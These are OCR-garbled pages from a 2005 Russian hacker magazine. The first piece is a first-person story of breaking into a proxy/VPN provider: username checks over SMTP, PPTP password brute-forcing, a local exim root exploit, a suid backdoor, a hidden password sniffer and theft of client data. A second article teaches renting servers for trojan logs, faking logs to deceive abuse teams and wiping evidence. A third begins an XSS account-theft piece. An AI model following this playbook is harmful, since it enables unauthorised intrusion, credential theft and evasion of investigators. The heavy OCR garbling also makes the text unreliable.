во вкладку 55 Н и отметь 
галочкой Ооп'і аііосаіе а 
ргеисіо-іегтіпаі. 

На компакте ты найдешь 
портативный снифер, а так- 
же свежую версию РРТР- 
Вгиіег от команды ТНС. 



скинул мой напарник. Описание 
хостинга выглядело примерно, 
как иаопІіпе-ГідГюзІ-сІизІег. Эта 
надпись показалась мне до боли 
знакомой и через некоторое вре- 
мя я вспомнил почему. Как ока- 
залось, я сам пробивал по хуизу 
адрес ргоху4уои.пеі, и тот ока- 
зался в той же подсети, что и по- 
следний адрес. Все это косвенно 
указывало на то, что жертва 
пользуется услугами ргоху-сер- 

виса. Я поделился размышлениями с другом и потом пожалел об 
этом. Сразу же посыпались просьбы попробовать внедриться в этот 
ресурс и поснифать трафик с этого айпишника. Я согласился. 

Атака началась со стандартных вещей. Перво-наперво я занялся скани- 
рованием. Сканить решил всю подсеть с помощью старого доброго І_АІ\І- 
ОиагсІ Зсаппег. Ни к чему хорошему это не привело, потому как хост 
ргоху4уои.пеі вообще оказался недоступным для этой программы, а 
остальные узлы, по-видимому, выступали в роли дополнительных ІР, на 
которых вообще не светились никакие порты. Но я-то знал, что ЛАН- 
Гуард определяет живучесть хоста при помощи ІСМР-запроса. Логич- 
ным заключением можно было назвать тот факт, что установленный на 
машине файрвол просто резал весь ІСМР-трафик. 

Запустив птар с опцией -Р0, я получил список открытых портов: 22, 
25, 80, 1723, 5000 и 6709. Воспользовавшись телнетом, я узнал, что 
за цифрой 6709 скрывается обычный проксик типа ЗциісІ. Оставалось 
определить, что за сервис находится под 5000 портом. Все стало 
понятно сразу после того, как я зашел на сайт этой конторы: 
оказалось, что ребята предоставляли не только ргоху, но и ѵрп-сер- 
вис. Так что под этим портом скрывался ОрепѴРЫ — это я выяснил по 



характерным иероглифам, которые выдавались после соединения. 
Однако все эти исследования не сдвинули дело с мертвой точки. 
Необходимо было хоть каким-то образом проникнуть на машину. Скани- 
рование скриптов на ІгаѵегзаІ, зді-іпіесііоп и прочие баги не привели к 
большому успеху, поэтому я стал просто тупо ходить по ссылкам и... на- 
шел кое-что интересное. Нет, я не обнаружил невидимый рГіртуасІтіп 
или ѵѵеЬ-шелл, как ты мог предположить. Я наткнулся на страницу, где 
в картинках описывалась настройка ѴРЫ-соединения. И один из скрин- 
шотов меня очень насторожил. На нем отображался последний шаг на- 
стройки ѴРІЧ, вот только логин был не очень стандартный. Вместо ка- 
ких-то тривиальных имен типа бегло, Іезі и т.п. использовался логин 
тісГіаеІ. В качестве пароля отображались пять звездочек. Может быть, 
это было случайно придуманное имя, однако дальнейший шаг доказал, 
что это было неспроста. Я решил попробовать отправить тестовое пись- 
мо пользователю тісГіаеІ через их ЗМТР-сервер. Думаю, понятно, на что 
я рассчитывал — если системного имени не существует, мне вернется 
ответ демона о некорректном имени пользователя. Но такого ответа не 
вернулось, следовательно, логин Майкла существует и, по-видимому, 
активно используется. 

[активная атака] Дальнейшая логика моих действий была следую- 
щей: мне ничего не оставалось, как запустить процесс перебора пароля 
на сервис РРТР ѴРЫ с быстрого шелла. Для эффективного брутфорса я 
отфильтровал все пятизначные пароли из большого словаря. Действи- 
тельно, если имя совпало, то, скорее всего, совпадет и длина пароля. По 
крайней мере, я на это искренне надеялся. 

И я не прогадал (я вообще редко когда пользуюсь брутфорсерами, 
если не уверен в победе). РРТР-ВгЫег, про особенности которого я уже 
писал в моих статьях, справился с задачей «на ура». Спустя полчаса 
брутер ответил, что успешно подобрал пароль к учетной записи. Сразу 
после этого было принято решение попробовать полученную комбина- 
цию І/р для входа по ЗЗН. И опять успех — тісГіаеІ имел доступ к маши- 
не по ззП. Для пущей маскировки я залогинился с ключиком -Т, чтобы 
не подвязывать к себе псевдотерминал и не палиться в журналах 
/ѵаг/Іод/Ытр и /ѵаг/гип/иітр. В системе на тот момент никого не было, 
поэтому можно было без палева изучать удаленный сервак. Первым 
делом я посмотрел процессы — стандартный набор: ррфб, орепѵрп, 
зциіб, зепбтаіі, ехіт и еще несколько сервисов. Ничего необычного — 
простая І_іпих-станция. Насторожило лишь одно: то, что админы пове- 
сили ѴѴеЬ-сайт на рабочий ргоху- и ѵрп-сервер. Обычно под это дело 
выделяется отдельная тачка, хотя бы ради безопасности. К несчастью, 
мне не хватило прав не только на просмотр учетных записей ргоху и 
ѵрп, но и на чтение каталога /изг/зегѵісе, содержащий всю интересную 
информацию. Поэтому мне нужно было приложить все усилия и повы- 
сить свои права до нулевого уровня. 

[операция «Захват-110»] Не найдя ничего подходящего в папках, 
которые были мне доступны и перечитав все логи и истории вводимых 
команд, я не добился никаких успехов. Ядро в системе было 2.4.27 вер- 
сии, и я также попробовал его взломать. Стандартные эксплойты выда- 
вали какую-то ерунду, а самый последний я не решился испытывать, 
так как завалил им множество систем (на 99% атака просто бы парали- 
зовала сервер). Полностью отчаявшись, я скачал старый добрый сце- 
нарий сГіеск.зГі ( Шр://катепзк.пеі.ги/{огЬ/1/х/сІіеск.зІі ) и запустил его на 

что этот чекер проверяет все 
зиісі/здісі/подгоир-файлы на сер- 
вере, а также выдает полную 
информацию об операционной 
системе. После детального от- 
чета я выудил несколько зиісі- 
файликов и принялся их изу- 
чать. С виду это был стандарт- 
ный набор приложений: ріпд, 
Ігасегоиіе, зи, зибо, ехіт и еще 
несколько бинарников. Первым 
делом я скачал эксплойт для зи- 
сіо и попытался его запустить, 
однако ни к чему хорошему это 
не привело: то ли версия была 
новой, то ли эксплойт был кри- 
воват. Тут я вспомнил, что и для 
ехіт имеется сплоит ( ѵѵѵѵѵѵ .ха- 
кер. ги/розІ/270 1 0/ехрІоіі. /х/) , ко- 
торый работает только локаль- 
но и переполняет буфер у поч- 
тового сервиса. Скомпилировав 
и запустив его, я убедился, что 



!. Для незнающих 



ЧТО ПОМОГЛО МНЕ ПРИ 
ВЗЛОМЕ? 

Щ Первоначальное скани- 
рование хоста на порты да- 
ло мне общее представле- 
ние о функционирующих 
демонах. 

\ 2 \ Прежде чем использо- 
вать эксплойты, я отыскал 
все зиісі-файлы на сервере. 
Это помогло найти уязви- 
мый бинарник и достичь 
рутовых прав. 

[з] Интересная маскировка 
при помощи поііир не раз 
спасала мои процессы от 
глаз администраторов. Так 
что возьми этот трюк на 
заметку :). 



[ХАКЕР 11 [83] 05 > ВЗЛОМ 053 ] 





[хакер 11 [83] 05 > ВЗЛОМ 054 ] 




Не стоит забывать, что 
все действия хакера про- 
тивозаконны, поэтому 
данная статья дана лишь 
для ознакомления и орга- 
низации правильной за- 
щиты с твоей стороны. За 
применение материала в 
незаконных целях, автор 
и редакция ответственно- 
сти не несут. 



ЮЕРЕІМСЕ пишут реальные вещи 

— эксплойт сработал как часы и 
предоставил рутовый шелл. Мы- 
сленно передав привет админу, 
который засуидил демон, я про- 
должил мониторинг за сервером. 

По старинке, я создал зиісі-бэкдор 
и положил его в неприметное ме- 
сто (на всякий случай) и стал 
жадно шарить по жесткому диску. 

В заветной папке /изг/зегѵісе на- 
ходилась структура каталогов 

для сервисов зциісі и орепѵрп. В одном из каталогов я нашел готовые 
скрипты для запуска орепѵрп на клиентской стороне, а также лист 
учетных записей в открытом виде. Первое, что я хотел сделать, — 
определить логин на- 
шей жертвы. Быть 
может он как-то свя- 
зан с его ником или е- 
таіГом. Но логины 
выбирались «от фо- 
наря», поэтому удача 
мне не улыбнулась :). 

Но мне посчастливи- 
лось найти файл сіі- 
епіз.хіз. Его вес до- 
стигал 800кб и навер- 
няка он содержал в 
себе всю информа- 
цию о клиентах серви- 
са. Использовав зср, 
я скопировал этот 
файл на свой дове- 
ренный шелл, а затем 

— на комп. Но при от- 
крытии с меня потре- 
бовали пароль ;). Ко- 
нечно, можно было 
убить полдня на пере- 
бор комбинаций или 
сгрузить с шт гразз- 
і /ѵогсіз.ги программу- 
брутфорс, но мне про- 
сто не хотелось этим 
заниматься. Я пред- 
почел вернуться в 
консоль и добить сер- 
вер до конца. 




хач под эту прогу, од- 
нако мне нужно было 
каким угодно образом 
скрыть редирект, ко- 
торый бы отображал- 
ся в процесс-листе. 
Здесь можно было по- 
ступить двумя спосо- 
бами: либо вызвать 
функцию ехесІ() в спе- 
циальном приложе- 
нии, где можно огово- 
рить параметр, посту- 
пающий в процесс- 
лист. Либо поступить 




фрагмент интересных логов 




маскируемся с помощью поНир 



[слушаем линию] Пообщавшись с приятелем, мы решили поставить 
тачку на прослушку. Причем загвоздка заключалась в том, что нужно 
снифать все 80 интерфейсов, которые были активны, потому как ір-ад- 
рес, выдаваемый клиенту, выделяется совершенно случайно (по прото- 
колу ОНСР), а зциісі использует всего 3 айпишника, которые находятся 
в другой подсети. Из этого можно сделать разумный вывод: наша жер- 
тва использует не ргоху, а ѵрп-подключение. Но сути вопроса это не ме- 
няло, так как ѴРЫ-трафик шифруется только на участке «клиентосер- 
вер», а затем перебрасывается в чистом виде на выходной интерфейс. 
Наша задача была — прослушать этот интерфейс и собрать компромат 
на жертву. Однако за незнанием определенного номера интерфейса, 
пришлось ставить на прослушку весь внешний трафик. 

Дело оставалось за малым — нам нужно было определиться с хорошим 
снифером, который бы отлавливал только пароли. Просмотрев список 
имеющегося софта, я остановился на программе РНозз (і/ѵмѵ.р/іелое- 
ІіІ.сІе/рІіозз/РНоззЗ.дг). По словам разработчиков, этот снифер умеет 
отлавливать пароли по протоколам РОРЗ, ІМАР, РТР, ТЕІ_ЫЕТ, ШАР и 
ѴЫС. То, что доктор прописал. 

Я закачал этот нюхач на сервер, затем распаковал и был приятно удив- 
лен: снифер состоял всего из одного файла. Сначала у меня были не- 
которые сомнения, что это чудо природы вообще запустится. Но после 
команды ./РНоззЗ -Неір все стало ясно. Софтина доказала свою проф- 
пригодность: в параметрах можно было указывать конкретный интер- 
фейс, осуществлять фильтрацию и включать буферизацию. В общем, 
минимум возможностей, с которыми можно жить. 

Итак, прежде чем запускать снифер, я внимательно ознакомился с про- 
цессами. Среди них было несколько потоков ИПрсІ и программы для ав- 
торизации зциісі под названием пзса_аиІІі. Я решил замаскировать ню- 



местил РНоззЗ в /изг/Ып и назвал его пзса_аиІП. Затем с помощью ге- 
ниального приложения поИир запустил снифер. Появилось оповещение, 
что весь вывод приложения будет записываться в поііир.оиі. В общем, 
строка запуска выглядела так: «поНир пзса_аиІП &». Проверив процесс- 
лист, я убедился, что подложный процесс практически никак себя не вы- 
дает. А тем временем в файле поИир.оіЛ стала накапливаться конфи- 
денциальная информация. 

[разбор полетов] Через пару дней активного снифинга, я выключил 
анализатор пакетов и слил логи себе на комп. Удалось поймать поряд- 
ка 10 мегов информации. Теперь нам предстояла сложная задача по от- 
делению мух от котлет, чем мы и стали заниматься. Примечательно, что 
мой товарищ знал провайдера, к которому подключена жертва. Это и 
явилось ключевым фильтром. Пробив по ѴѴНОІ5 диапазон адресов мо- 
сковского прова, мы быстро отфильтровали несколько учетных записей 
на РТР- и РОРЗ-протоколы. Среди них большинство, действительно, 
принадлежало нашему неприятелю, по крайней мере, так сказал мой 
корефан. Через некоторое время выяснилось, что жертва промышляла 
фишингом: нам удалось достать пароли на РТР-серверы с логами от 
разных богатых персон. 

Что касается сервиса, то буквально через неделю админы наглухо за- 
фильтровали 22 порт. Видимо, администрация уследила утечку ин- 
формации или странные коннекты в логах (которые я почему-то забыл 
потереть :)). Но в любом случае, все к чему мы стремились, было вы- 
полнено, а сервис более не представлял для нас особого интереса. На 
память от него у меня осталась клиентская база, которую я до сих пор 
так и не могу открыть 0 




красочный контент сервиса 










Лицензии Министерства РФ по связи и информатизации № 24136, № 21780, № 17333. Товар сертифицирован, і-тосіе и логотип і-тосіе являются зарегистрированными товарными знаками компании ІМТТ ЭоСоМо 
в Японии и других странах. Услуга предоставляется при наличии телефона с поддержкой і-тосіе. Информация о региональных лицензиях и территории действия услуги на ѵѵѵѵѵѵ.тіз.ги 



будь в і-тосіе 





Батзипд 5410І - 
твой й телефон 
в стиле і-тосіе! 






Нажми на кнопку... 



V 








...и ты в интернете! 

Кнопка і-тосіе™ — это быстрый доступ 
к возможностям интернета в твоем мобильном 
телефоне. Почта, новости, афиша, погода, спорт, 
мелодии, картинки и многое другое. 

Теперь не нужно никаких настроек. 

Батзипд 5410І с кнопкой і-тосіе уже готов к работе! 

• 1.3-мегапиксельная камера, вспышка 

• Запись видео (МРЕС4) и видеосообщения 

• МРЗ-плеер с управлением на крышке 

• 262 144 цветов — внутренний ТРТ-дисплей (176 х 220) 

• 65 536 цветов — внешний 01_Е0-дисплей (96 х 96) 

• 64-инструментальная полифония 

• Поддержка ВІиеІооіН 



новая кнопка на твоем мобильном 

Башзипд 54101 






Б5Ш 



ѵѵѵѵѵѵ.ітогіе.тІіБ.ги 



ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 





Дедик для хакера 

ЧАСТО ХАКЕРАМ НЕ ХВАТАЕТ СОБСТВЕННОГО КОМПЬ- 
ЮТЕРА ДЛЯ СВОИХ ЗЛОДЕЯНИЙ. СКАЖЕМ, ЧЕЛОВЕК, 
УВЛЕКАЮЩИЙСЯ ТРОЯНАМИ, ОБЯЗАТЕЛЬНО ЗАХОЧЕТ 
ИМЕТЬ НА ПОПЕЧЕНИИ СЕРВЕР ДЛЯ ЛОГОВ. ЧУВАК, 
ВЗЛАМЫВАЮЩИЙ БУРЖУЙСКИЕ САЙТЫ, ПОЖЕЛАЕТ КУ- 
ПИТЬ БЕЗОПАСНЫЙ СЕРВЕР ДЛЯ ѴРЫ И РРЮХѴ. НО ХА- 
КЕРОВ МАЛО КТО ЛЮБИТ, ПОЭТОМУ СКОЛЬКО ПРОЖИ- 
ВЕТ «ЧЕРНЫЙ СЕРВЕР» — НЕИЗВЕСТНО. ХОЧЕШЬ УЗ- 
НАТЬ, КАК УВЕЛИЧИТЬ СРОК ЖИЗНИ ДО МАКСИМУМА? 

ТОГДА СЛУШАЙ СЮДА I Докучаев Дмитрий ака РогЬ (кэгЬ@геаІ. хакер, ш) 



Выбираем сіесіісаіесі-сервер для хакерских проделок 



[08 и ѴО§ — найди 1 0 отличий] 

Прежде чем обсуждать проблемы 
приобретения серверов, определим- 
ся с базовыми понятиями. От начала 
до конца статьи я буду говорить про 
Эесіісаіесі-сервера. Здесь Эесіісаіесі 
означает «выделенный», то есть кли- 
енту выделяется целый сервер, есте- 
ственно, с рутовыми правами. Тут 
имеют место две разновидности: 
либо человеку выделяется отдельная 
машина в серверной стойке (йЗ), ли- 
бо сервер запущен виртуально, срод- 
ни ѴтѴѴаге (\ЮЗ). Естественно, что 
по стоимости виртуальный выделен- 
ный сервер в 5 — 8 раз дешевле ре- 
ального. Это понятно — затраты на 
инсталляцию настоящей машины ку- 
да больше, чем запуск скрипта, инс- 
таллирующего новую 03 на уже су- 
ществующей станции. Но у виртуаль- 
ного сервера есть ряд существенных 
недостатков, которые обязательно 
следует учитывать перед покупкой. 
Не будет лишним их перечислить. 



Щ Несмотря на рутовые привиле- 
гии, тебе не удастся добавить но- 
вое устройство или пересобрать 
ядро. На некоторых машинках да- 
же нельзя управлять зузсІГом, ис- 
пользовать ірІаЫез, загружать мо- 
дули и т.п. 

\2\ На тарифных планах с вирту- 
альным сервером обычно не пре- 
доставляются дополнительные ІР- 
адреса. Данный недостаток может 
быть критичным для некоторых 
проектов. 

[з] Безопасность в ѴЭЗ оставляет 
желать лучшего. Так как машина со- 
держит несколько серверов, адми- 
нистратор может легко заглянуть на 
твой виртуальный жесткий диск и 
легко там пошариться. С реальной 
машиной такое не пройдет. Чтобы 
посмотреть содержимое винта, сле- 
дует, как минимум, снять машину из 
серверной стойки (служба поддерж- 
ки не имеет права войти на сервер 
без твоего согласия). 



Перед регистрацией на серве- 
ре создай себе ящик на аме- 
риканском хостинге, напри- 
мер на дтаіі.сот. Эго помо- 
жет тебе создать образ тупо- 
ватого богатого амера. 

Обычно хостинговые компании, ко- 
торые предоставляют приватные 
серверы, продают и реальные. 
Я сторонник полноценных дедиков 
и всем советую покупать только 03, 
а не экономить на своей безопас- 
ности. Но дело, как говорится, твое :). 
Напоследок упомяну, что реальные 
машины стоят от 40 до 500 баксов в 
месяц (есть эксклюзивы и по $999, 
но о них я пока умолчу :)), цена вир- 
туальных машинок колеблется от 5 
до 1 00 долларов в месяц. 

[каким путем пойти?] Допус- 
тим, ты решил приобрести себе 
машину для разных хитрых целей. 
Сперва встает вопрос о проверен- 



Адрес Зесигііу-службы можно 
узнать через Ш0І5-сервис 
( мѵ/м.піс.ги/шІюі8/?ір=ір- 
аббгезз). Обычно все 
датацентры публикуют 
его в специальном поле. 

ных и надежных датацентрах, где 
можно купить заветный сервер. 
Взять дедик можно двумя спосо- 
бами: напрямую, либо через пос- 
редника. Я рассмотрю оба случая, 
а ты выберешь для себя самый 
оптимальный. 

Первый способ заключается в по- 
иске человека, торгующего серве- 
рами. Отыскать таких можно на лю- 
бых форумах по сетевой безопас- 
ности. За примерами далеко хо- 
дить не надо, в недавнем выпуске 
X N30 писал статью про подобные 
форумы. На каждом из них ты най- 
дешь минимум 2 — 3 объявления 
с такими услугами. Народ там на- 
верняка проверенный, но не стоит 







думать, что, купив сервер, ты при- 
обретешь поддержку 24/7 и ста- 
бильный аптайм. Нередко ресел- 
леры покупают серверы у плохих 
датацентров и не читают почту с 
накопившимися жалобами :). 
Все это ведет к внезапному бло- 
кированию аккаунта. Еще одна 
проблема кроется в том, что ес- 
ли ты накосячил с настройками 
сервера, перезагрузить, а тем 
более починить машину будет 
проблемно. Суди сам, для этого 
тебе потребуется найти чувака, 
который покупает сервер, и зас- 
тавить его отписать в техподде- 
ржку датацентра. Учитывая по- 
фигизм продавцов, сделать это 
очень сложно. 

Из плюсов могу отметить то, что 
продавец всегда посоветует са- 
мую безопасную страну, у тебя 
никогда не будет проблем с оп- 
латой сервера, а также гаранти- 
рует некоторую анонимность (по 
крайней мере, вычислить тебя 
будет непросто). 

Но по моему скромному мнению, 
все-таки лучше работать напря- 
мую с хостингом. Это позволит 
оперативно отреагировать на жа- 
лобу в твою сторону, а также не 
переплачивать на услуги продав- 
ца (он может содрать с тебя лиш- 
ние 20 — 30 долларов). 

Но при прямой работе с датацент- 
ром, необходимо четко знать, в 
какой стране тебе нужна машина. 



Если сервер берется для палено- 
го проекта, то стоит брать машин- 
ку в Азии (Китай, Корея, Тай- 
вань). В таких центрах админист- 
раторы более лояльны к абузам, 
а иногда и вообще их не читают. 
Если ты решился брать дедик в 
штатах, то будь готов к внезап- 
ным отключениям из-за малей- 
шего нарушения правил. Еще од- 
ним оптимальным вариантом яв- 
ляется Европа (Нидерланды, Гер- 
мания, Италия). Специально для 
тебя я оформил врезку с адреса- 
ми датацентров, которым можно 
доверять :). 

После того как ты определился 
со страной, нужно убедиться, что 
покупка может быть совершена 
с помощью популярных платеж- 
ных систем. О ѴѴеЬМопеу можно 
сразу забыть! Буржуи не любят 
наши деньги :). А вот ѴѴезІегп 
ІІпіоп, Едоіб и РаураІ принимают 
многие хостеры. Напрямую день- 
ги за услуги лучше не перево- 
дить. Достаточно обратиться к 
многочисленным обменникам, 
например ехрегіехсЬапде.ги, и 
обменять ѴѴеЬМопеу на любую 
другую валюту. 

Помни, что многие датацентры 
берут скрытые платежи — за 
инсталляцию и техподдержку. 
Эти вопросы лучше сразу же 
уточнить предварительным пись- 
мом. И запомни самое главное 
правило — никогда не пиши им с 
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русского е-таіі адреса. Некоторые 
тебе просто не ответят, а некото- 
рые охотно зарегистрируют, но 
отключат сервер сразу же после 
первой жалобы. Все-таки сочета- 
ние «русский хакер» известно и за 
рубежом. А вот, если ты предста- 
вишься америкосом, то можешь 
существенно упростить процесс 
рассмотрения жалоб. 

После того как сервер оплачен, че- 
рез 2 — 3 дня его поднимут и отпи- 
шут тебе ІР-адрес, логин и пароль. 
С этой минуты ты можешь пользо- 
ваться своей машиной, сканиро- 
вать подсети на баги, складывать 
туда логи от троянцев и многое 
другое. До первой жалобы :). 

[ох уж эти абузы] Так называе- 
мые абузы (аЬизе или просто арбу- 
зы :)) регулярно будут поступать в 
адрес зесигііу-службы твоего дата- 
центра. Эксперты оценят вес жа- 
лобы и обязательно оповестят те- 
бя об инциденте. Здесь все зави- 
сит от правил хостера, которые 



следует обязательно прочитать пе- 
ред регистрацией. Некоторые ком- 
пании сразу же блокируют доступ 
к серверу при первом же случае 
(обычно американские центры), 
другие же допускают 1 — 2 жалобы, 
после чего предупреждают об отк- 
лючении. Третьи просто рекомен- 
дуют разобраться напрямую с 
пострадавшим с обязательной ко- 
пией всей пересылки в адрес зеси- 
гііу-службы. И, наконец, бывают и 
абузоустойчивые центры, которые 
вообще не воспринимают какие- 
либо жалобы :). Последних очень 
мало, да и цена на такие «черные 
серверы» может достигать до 1000 
долларов в месяц. Но согласись, 
что безопасность дороже денег :). 
Предположим, что ты затроянил ка- 
кого-то ламера через проксик, стоя- 
щий на твоем дедике, и жертва за- 
палила твой ІР-адрес (не совсем 
твой, конечно, а адрес выделенного 
сервера). Пострадавший жалуется 
в датацентр, объяснив всю суть 
проблемы и приложив логи своего 



файрвола. После этого служба бе- 
зопасности отписывает тебе письмо 
с претензией. Здесь, как я уже гово- 
рил, все зависит от правил компа- 
нии, но если тебя сразу не отключи- 
ли, то есть шанс выйти сухим из во- 
ды. Я бы поступил следующим об- 
разом: вначале отписал службе бе- 
зопасности о том, что на машине 
был поставлен анонимный проксик 
через дыру в системе, и какой-то 
хакер сидел через него. Для остро- 
ты ощущений можно приложить ка- 
кие-нибудь псевдо-логи и ІР-адреса 
нарушителей. Если ты зарегистри- 
рован не под русским е-таіГом, то 
есть шанс, что тебе поверят и оп- 
равдают. В любом случае не теряй 
надежды, даже если жалоба очень 
весомая. Всегда можно найти комп- 
ромисс или наврать с три короба, 
после чего админы либо забудут 
про инцидент, либо дадут время са- 
мостоятельно решить проблему. 
Бывает, что жалоба очень серьез- 
ная и оправдать себя тебе будет 
невозможно. Скажем, если был 
взломан какой-нибудь крупный 
проект, либо если дело касается 
спама. В этом случае тебе нужно 
убедить администрацию не отклю- 
чать сервер 1 — 2 дня для изучения 
проблемы, а за это время сделать 
Ьаскир всего софта и удалить все 
системные журналы (можно вооб- 
ще удалить всю информацию 
с ИОО специальными утилитами). 
Один мой приятель каждый месяц 
меняет машину на хостинге, регист- 
рируясь заново под новым мылом. 
Как показывает практика, в Сети за 
месяц «свечения» машины жалобы 



маловероятны , по крайней мере, их 
не так много, чтобы дать повод зеси- 
гііу взять сервер под наблюдение. 

[скрытая угроза] Вполне может 
быть, что на твой сервер решили 
пожаловаться не датацентру, а, 
например, ФБР или Интерполу. 
В данном случае спецслужбы обра- 
тятся к хостеру и выберут специаль- 
ную стратегию. Скажем, никто не 
оповестит тебя о нарушении, а весь 
трафик будет поставлен на прослу- 
шивание. Определить подобное 
сложно, но можно попробовать это 
сделать. Во-первых, попробуй вос- 
пользоваться методиками обнару- 
жения пассивного и активного сни- 
финга (я об этом писал в X 07/2005) 
и поставь пару софтинок, например 
агрѵѵаісіі. Далее можно установить 
какую-нибудь локальную ЮЗ, чтобы 
не допустить замену системных 
файлов. И, наконец, если ты заме- 
тил внезапное отключение машины 
без причины на несколько часов 
(или даже минут) есть повод заду- 
маться. Возможно, твой сервер 
выдвигали из стойки, а жесткий 
диск снимался для изучения. Если 
ты вляпался во что-то серьезное, 
рекомендую залечь на дно и вооб- 
ще не заходить на сервер. 

Скажу также про заходы на сервер 
и безопасность. Обязательно ис- 
пользуй прокси при коннекте в 
консоль. Оно того стоит, поверь 
мне, если спецслужбы решат пои- 
зучать содержимое жесткого дис- 
ка или поставят машину на прос- 
лушку, проксик или соке спасет те- 
бя от незваных гостей. Что касает- 
ся системных логов, то их реко- 
мендую убить сразу: тебе они вряд 
ли пригодятся, а администрации 
их лучше не изучать :). 

Но что же делать, если твой сервер 
внезапно отключили? Не стоит впа- 
дать в панику, быть может, дискон- 
нект произошел случайно или «за 
неуплату». Сразу же стоит написать 
письмо в техподдержку, на которое 
тебе обязательно ответят. Если 
причиной отключения стал абуз, те- 
бя, скорее всего, отправят на дли- 
тельную переписку со службой бе- 
зопасности. В противном случае, 
тебе предоставят счет к оплате, ли- 
бо скажут, что сервер лежит по ава- 
рийным обстоятельствам. Еще раз 
напомню, что в подобных случаях 
следует держать ухо востро, быть 
может, твою машинку пытаются 
поставить на прослушивание. 

[брать или не брать?] Про осо- 
бенности выделенных серверов 
можно написать несколько статей, 
но, думаю, после прочтения этой ты 
понял важные моменты: где, как и 
за сколько реально купить сервер 
под личные нужды, а также правила 
общения со службой безопасности. 
Но если у тебя что-то не клеится или 
ты не можешь определиться со 
страной, задавай вопрос на почту — 
отвечу, как только смогу © 



ЧТО, ГДЕ, ПОЧЕМ? 

С твоего позволения, позволь представить список из известных датацентров, у которых можно 
брать выделенные серверы. С этими компаниями имел опыт либо я, либо кто-то из моих 
приближенных коллег. 



ѵѵѵѵѵѵ.Мсзегѵегз.пеі 

Американский дата- 
центр, штат Чикаго. 

Я работал с ними при- 
мерно год, и могу ска- 
зать, что проблем с 
абузами у меня практи- 
чески не было. Аптайм 
сервера примерно 90— 
95% в месяц ( бывали 
перебои), но саппорт 
отвечает довольно 
быстро через ѴѴеЬ- 
ЬазесІ-ІіеІрсІезк. Цены 
на серверы колеблют- 
ся от 50 до 200 долла- 
ров. Приплюсуй 
к этому бесплатные 
добавочные ІР-адреса 
и халявный трафик :). 



ѵѵѵѵѵѵТІіерІапеісот 

Америка, Даллас. 
Быстрый сетап серве- 
ра, аптайм 100% (без 
перебоев), мощные 
серверы вплоть до 
кластерной технологии, 
винт от 1 60 гб/гаіеі. Есть 
возможность общаться 
с суппортом по микро- 
фону через специаль- 
ный гейт, который дос- 
тупен на сайте (если, 
конечно, хорошо зна- 
ешь английский :)) 



ѵѵѵѵѵѵ.ІеазеѵѵеЬ.пеі 

На этот раз датацентр из 
Голландии. Здесь серве- 
ры можно купить за 200 
— 300 евро за 3 месяца, 
плюс к этому нужно пла- 
тить за трафик 
(1 гиг— 1 евро) и за 
добавочные айпишники. 
Но прежде чем сотруд- 
ничать с ними, озна- 
комься с их запутанны- 
ми правилами — помо- 
жет в будущем :) 



ѵѵѵѵѵѵ.ІіозІік.сот 

Китайский датацентр. 
Принимают РауРаІ, 
ставят сервер всего за 
сутки. Перебоев не 
наблюдал, но сам сер- 
вером не пользовался 
(описание со слов зна- 
комого). Но китайцы 
народ лояльный, поэто- 
му абузы почти не 
воспринимают, а уж 
тем более не блокиру- 
ют аккаунт. 



ѵрзкогеа.сот 

На этот раз датацентр 
из Кореи. Здесь про- 
даются только лишь 
\Ю8 по 40 и по 80 бак- 
сов в месяц. Серверы 
работают без перебо- 
ев, но только лишь на 
канале в ІОМЬ, также 
корейцы не выдают 
дополнительные ай- 
пишники. Но по запросу 
ты можешь получить в 
распоряжение рутовый 
сервер совершенно 
бесплатно — для теста. 



Вот, собственно, и весь доверенный список. Но он на этом не заканчивается, остальные 
датацентры также имеют свои плюсы и минусы. А найти ты их можешь на поисковых 
системах по простому запросу ОесИсаІесІ Зегѵегз. 
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Подробная информация и подключение - на сайте 

ѵѵѵѵѵѵ.ги^Ііпк. ігііо и по телефону (095) 540 37 35 







ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕППІІМ НЬЮСЫ 



Дырявая Ася 

КАК ИЗВЕСТНО, БОЛЬШИНСТВО 
САЙТОВ В СЕТИ ЯВЛЯЮТСЯ УЯЗ- 
ВИМЫМИ. И НЕ ОБЯЗАТЕЛЬНО 
ЭТО ОБЫЧНЫЕ ДОМАШНИЕ СТРА- 
НИЧКИ: НЕРЕДКО БАГИ МОЖНО 
ВСТРЕТИТЬ ДАЖЕ У ТАКИХ ГИ- 
ГАНТОВ, КАК МАЙКРОСОФТ, ЫАЗА 



И ІСО. ХОТЯ АДМИНИСТРАТОРЫ 
И НАУЧИЛИСЬ ЗАЩИЩАТЬ СВОИ 
ТВОРЕНИЯ ОТ РНР-ИНКЛУДОВ И 
ЗОЬ-ИНЪЕКЦИЙ, СЗЗ ДЫРЫ КАК 
БЫЛИ, ТАК И ОСТАЮТСЯ. А ВСЕ 
ОТТОГО, ЧТО, ПО МНЕНИЮ МНО- 
ГИХ ГЛУПЫХ АДМИНОВ, ЧЕРЕЗ 



СЗЗ НИЧЕГО СЕРЬЕЗНОГО СОТ- 
ВОРИТЬ НЕЛЬЗЯ. НАДЕЮСЬ, МОЯ 
СТАТЬЯ СЕГОДНЯ РАЗВЕЕТ ЭТО 
ПРИЕВШЕЕСЯ МНЕНИЕ. Я РАС- 
СКАЖУ, КАК Я УГОНЯЮ ІСО-УИНЫ 
ЧЕРЕЗ БАГ НА САЙТЕ ІСО. СОМ 

I РіпкРапФег (РіпкРапФег@Іпаск 2 опа.ги) 



Как я угоняю умны через дыры в ісд.сот 



[іпіго] Это была поистине удачная неделя: зці-инъекция на одном из сайтов ЫАЗА, 
дыры во ріігаск.огд и еще масса завораживающих воображение найденных уязви- 
мостей. Вот оказывается, какое вдохновение находит на человека, когда вся его род- 
ня на неделю сваливает на дачу. В общем, творческий рай для хакера :). 

Итак, история эта началась, как не удивительно, ночью. Сидел я и изучал новый ус- 
тановленный ісц-клиент цір, и переметнуло меня на поиск багов в самом главном сер- 
ванте всех айсикьюшников — ісд.сот. Давно собирался, честно говоря, но начал 
именно после знакомства с новым клиентом. 

[С88 через \сц клиент] На сайте ісц можно просмотреть профайл любого пользова- 
теля, зарегистрированного в системе. При этом можно посмотреть его аватарку, личные 
данные и даже накатать ему сообщение. Ну, ты знаешь. К примеру, профайл моего быв- 
